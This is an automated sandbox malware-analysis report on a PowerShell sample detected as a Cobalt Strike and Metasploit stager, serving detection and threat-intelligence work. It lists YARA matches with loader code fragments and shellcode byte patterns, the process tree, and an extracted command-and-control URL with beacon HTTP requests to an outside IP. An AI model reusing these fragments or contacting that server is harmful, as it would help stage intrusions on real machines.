Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TS-240622-CobaltStrike5.ps1

Overview

General Information

Sample name:TS-240622-CobaltStrike5.ps1
Analysis ID:1461070
MD5:464057f0e2c7f91bed00c5deb700dc93
SHA1:42c1a7aa0e4b4bac50650288cf1648726728b35e
SHA256:ee417a1cb4f2fa2dbb65b8a03a7e35e0a1c3215e331aa0de227e206f1e41ee8b
Tags:ps1
Infos:

Detection

CobaltStrike, Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected CobaltStrike
Yara detected Metasploit Payload
Yara detected MetasploitPayload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 2276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TS-240622-CobaltStrike5.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 4420 cmdline: C:\Windows\system32\WerFault.exe -u -p 2276 -s 2776 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"C2Server": "http://116.114.20.180:8088/aaPK", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)\r\n"}
{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)\r\n", "Type": "Metasploit Download", "URL": "http://116.114.20.180/aaPK"}
SourceRuleDescriptionAuthorStrings
TS-240622-CobaltStrike5.ps1JoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
    TS-240622-CobaltStrike5.ps1Msfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
    • 0x7f:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
    • 0x597:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
    • 0x67e:$s5: = [System.Convert]::FromBase64String(
    • 0x2f3:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
    • 0x4e1:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAA7.tmp.dmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
    • 0x37842:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAA7.tmp.dmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
    • 0x378ae:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
        00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
        • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
        00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
        • 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
        00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
          Click to see the 7 entries
          SourceRuleDescriptionAuthorStrings
          amsi64_2276.amsi.csvJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
            amsi64_2276.amsi.csvMsfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
            • 0xe1:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
            • 0x606:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
            • 0x6f3:$s5: = [System.Convert]::FromBase64String(
            • 0x35c:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
            • 0x54f:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

            System Summary

            barindex
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TS-240622-CobaltStrike5.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TS-240622-CobaltStrike5.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3756, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TS-240622-CobaltStrike5.ps1", ProcessId: 2276, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TS-240622-CobaltStrike5.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TS-240622-CobaltStrike5.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3756, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TS-240622-CobaltStrike5.ps1", ProcessId: 2276, ProcessName: powershell.exe
            Timestamp:06/22/24-10:17:00.631294
            SID:2037020
            Source Port:49711
            Destination Port:8088
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: TS-240622-CobaltStrike5.ps1Avira: detected
            Source: amsi64_2276.amsi.csvMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)\r\n", "Type": "Metasploit Download", "URL": "http://116.114.20.180/aaPK"}
            Source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://116.114.20.180:8088/aaPK", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)\r\n"}
            Source: TS-240622-CobaltStrike5.ps1ReversingLabs: Detection: 72%
            Source: TS-240622-CobaltStrike5.ps1Virustotal: Detection: 54%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.0% probability
            Source: Binary string: System.Configuration.Install.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Data.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Core.pdb`- source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Core.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Numerics.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.DirectoryServices.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: mscorlib.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Configuration.Install.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb8 source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@y' source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Xml.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.DirectoryServices.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.Automation.pdbP source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Configuration.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Data.ni.pdbRSDSC source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Data.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Configuration.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Xml.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.Automation.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.pdbSystem.Transactions.ni.dll source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Data.pdbH source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.Automation.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: mscorlib.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.pdbH source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Core.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Transactions.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Transactions.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Xml.pdbP41 source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Numerics.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Transactions.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr

            Networking

            barindex
            Source: TrafficSnort IDS: 2037020 ET TROJAN Suspected Cobalt Strike Beacon User-Agent String 192.168.2.6:49711 -> 116.114.20.180:8088
            Source: Malware configuration extractorURLs: http://116.114.20.180:8088/aaPK
            Source: Malware configuration extractorURLs: http://116.114.20.180/aaPK
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 8088
            Source: global trafficTCP traffic: 192.168.2.6:49711 -> 116.114.20.180:8088
            Source: Joe Sandbox ViewASN Name: CHINA169-BACKBONECHINAUNICOMChina169BackboneCN CHINA169-BACKBONECHINAUNICOMChina169BackboneCN
            Source: global trafficHTTP traffic detected: GET /aaPK HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)Host: 116.114.20.180:8088Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 116.114.20.180
            Source: unknownTCP traffic detected without corresponding DNS query: 116.114.20.180
            Source: unknownTCP traffic detected without corresponding DNS query: 116.114.20.180
            Source: unknownTCP traffic detected without corresponding DNS query: 116.114.20.180
            Source: unknownTCP traffic detected without corresponding DNS query: 116.114.20.180
            Source: global trafficHTTP traffic detected: GET /aaPK HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)Host: 116.114.20.180:8088Connection: Keep-AliveCache-Control: no-cache
            Source: powershell.exe, 00000000.00000002.2213129020.000001F46781A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.114.20.180/845-40f1-ac21-573d1d5ce43fL/AD
            Source: powershell.exe, 00000000.00000002.2213129020.000001F467882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2211751042.000001F4674B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.114.20.180:8088/aaPK
            Source: powershell.exe, 00000000.00000002.2192073706.000001F44D402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.114.20.180:8088/aaPKxeoc
            Source: powershell.exe, 00000000.00000002.2208242790.000001F45F480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2192509585.000001F44F7AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2208242790.000001F45F33E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2211751042.000001F467460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.2192509585.000001F44F2D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
            Source: powershell.exe, 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2211751042.000001F467460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000000.00000002.2192509585.000001F44F2D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000000.00000002.2208242790.000001F45F33E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.2208242790.000001F45F33E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.2208242790.000001F45F33E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2211751042.000001F467460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.2192509585.000001F450407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.2208242790.000001F45F480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2192509585.000001F44F7AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2208242790.000001F45F33E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            System Summary

            barindex
            Source: TS-240622-CobaltStrike5.ps1, type: SAMPLEMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
            Source: amsi64_2276.amsi.csv, type: OTHERMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
            Source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
            Source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
            Source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
            Source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
            Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTRMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
            Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAA7.tmp.dmp, type: DROPPEDMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
            Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAA7.tmp.dmp, type: DROPPEDMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD346544FB0_2_00007FFD346544FB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD346543250_2_00007FFD34654325
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3465AEFA0_2_00007FFD3465AEFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2276 -s 2776
            Source: TS-240622-CobaltStrike5.ps1, type: SAMPLEMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: amsi64_2276.amsi.csv, type: OTHERMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
            Source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
            Source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
            Source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTRMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAA7.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
            Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAA7.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.evad.winPS1@3/9@0/1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2276
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1vr0q23.4fk.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: TS-240622-CobaltStrike5.ps1ReversingLabs: Detection: 72%
            Source: TS-240622-CobaltStrike5.ps1Virustotal: Detection: 54%
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TS-240622-CobaltStrike5.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2276 -s 2776
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
